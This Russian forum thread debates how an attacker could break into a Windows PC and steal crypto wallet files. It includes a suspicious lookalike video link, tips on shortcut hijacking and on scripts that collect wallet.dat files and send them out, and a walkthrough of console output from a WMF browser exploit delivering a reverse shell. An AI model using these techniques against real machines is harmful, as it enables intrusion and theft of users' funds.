Нет, тему как раз надо продолжать:-)
Только вот ее автор походу всетаки троль, и никто его не обкрадывал((
Автор всетаки не открывал каких то левых ссылок?
Просто если открываешь ссылки, то вариков воровства становится поболе.
Маша, смотри какой прикол:
http://www.youtup.com/watch?v=A2C3b4jw8CkА там сплоит и загрузчик всего что сразу необходимо чтобы комп дальше уже сам искал своего хозяина пока он включен.
(мой IP 5.166.106.143, Windows, хакай)
Порт 7777 открытый + не стаит пачт устраняющий уязвимость с этим портом., эксплоит в интернете ходит.. Через ftp могут закинуть кейлоггер или ещё что-то. например удалённое управление сделать. Погугли как закрыть уязвимость, тоже вроде проскакивало. Бо хакнут, не бекул. А кто-то другой. тут у нас на форуме есть таких парочка.
Ты понимаешь что заканачанный файл в твою файловую систему не будет запущен
автоматически ? Ты понимаешь о чем говоришь ?
не стаит пачт устраняющий уязвимость с этим портом порты не связанны со службами напрямую... вы это понимаете ?
эксплоит в интернете ходит..ссылку на эксплойт и видео с применением на виртуалке
твое видео!!!, если ты такой профи, или опять все на турнире на твоем любимом было?
Да вот прикинь если в браузере уязвимость то при переходе по адресу происходит заливка и у тебя появляется шел.
В винде знаешь ли есть разные варианты загрузки автоматической, туева хуча кроме записи в службу.
Можно и в автозагрузку положить текущего пользователя, разве это требует прав более чем пользовательский шел?
(это если пользователь очень умный и запускал браузер не под админом, хотя большинство пользователей винды такие)
Ну это как пример.
А вообще конечно же сразу качается всё что необходимо сразу автоматически на будущее и рассовывается вовсюда куда только можно, доступ же появился уже.
ну он написал по сплоит фтп сервера, ну так так же заюзал и закинул файл куда нить для запуска.
Ну блин вы такую фигню говорите службу создать.
Нахрена такие сложности? Службу создать надо админские права вроде как в винде.
Может просто заменить путь и запускаемый файл у одного из его любимых ярлычков, если уж не вариант автозагрузки и т.д. стандартные?
ярлычок будет запсукать пограммульку которая на экран выводиться не будет, что-то там запускать и после уже запускать его любимую программульку. Вот и всё.
Поражаюсь с прикола получил доступ к жесткому, но ничего не сделаешь не запустишь в винде, вы чего?
Винда конечно ушла в чем-то вперед, но явно не настолько))
Ну и как бы админский доступ и чего-то там запуск и не нужен и вирусы никакие не нужны.
Сам напиши собственно ручно пограмму 5 строк делающую поиск по всем файлам и найденные wallet.dat отправляющую куда-то, и всё, нахрен вирусы?
Ну для случая с биржей у хакера другой софт соответственно собственоручно написаный, не 5 строк а не хера се, 200 наверно!))
Вот примерно вот так выглядит уже полученый через сплоит шелл:
Это вариант как тут было написано если стоит фтп сервер с уязвимостью и открытым портом.
Если портов не знаешь не открыты, сидит за натом и т.д., то сначала он должен получить ссылку или pdf файл или еще подобное, и когда он откроет это то ты увидешь такое:
Маша, смотри какой прикол:
http://10.0.0.1:8080/ (прим. вообще-то тут должен быть внешний ip)
Юзвер заходи по ссылке (и если у него есть эта конкретная уязвимость в IE) в консоли мы должны увидеть вот что:
- HTTP Client connected from 10.0.0.2:1116, redirecting... - клиент соединился, его IP 10.0.0.2:1116, редирект
- HTTP Client connected from 10.0.0.2:1117, sending 1604 bytes of payload... - отправлено 1604 байт начинки (реверс-шелл тут)
- Got connection from 10.0.0.1:4321 <-> 10.0.0.2:1118 - установлено соединение (пайп с cmd удалённого компа)
Microsoft Windows XP ['?абЁп 5.1.2600]
(') ?RаЇRа жЁп ? cЄаRбRдв, 1985-2001.
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>
О блин!, Это ещё что, скажете Вы - это командная строка удалённого компа того юзверя!
А что за абракадабра? - Это не та кодовая страница выбрана (у него русская винда стоит!) Щас проверим! chcp
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp
chcp
'?Єгй п ЄR¤Rў п бва -Ёж : 866
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>
Точно это 866, поставим 1251 (виндовую, а не дос)
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp 1251
chcp 1251
'?Єгй п ЄR¤Rў п бва -Ёж : 1251
C:\Documents and Settings\Администратор\Рабочий стол>
О! Теперь всё по русски! Что делать в cmd чужого компа зависит от вашей фантазии, список команд смотрите в help по консольным командам windows. (format c: - жесть!)
Был разобран конкретный пример использования WMF-Эксплоита с начинкой реверс-шелла, ваши варианты могут быть другими.
Естественно у тех кто занимается этим профессионально есть и сразу автоматические паки того что делать в таком случае, да и на сайте висит не один сплоит, а сразу пак их.
Даже удивительно что есть тут люди кто думают что человек получивший в винде командную строку или доступ к файловой системе ничего не сделает и не стырит и т.д.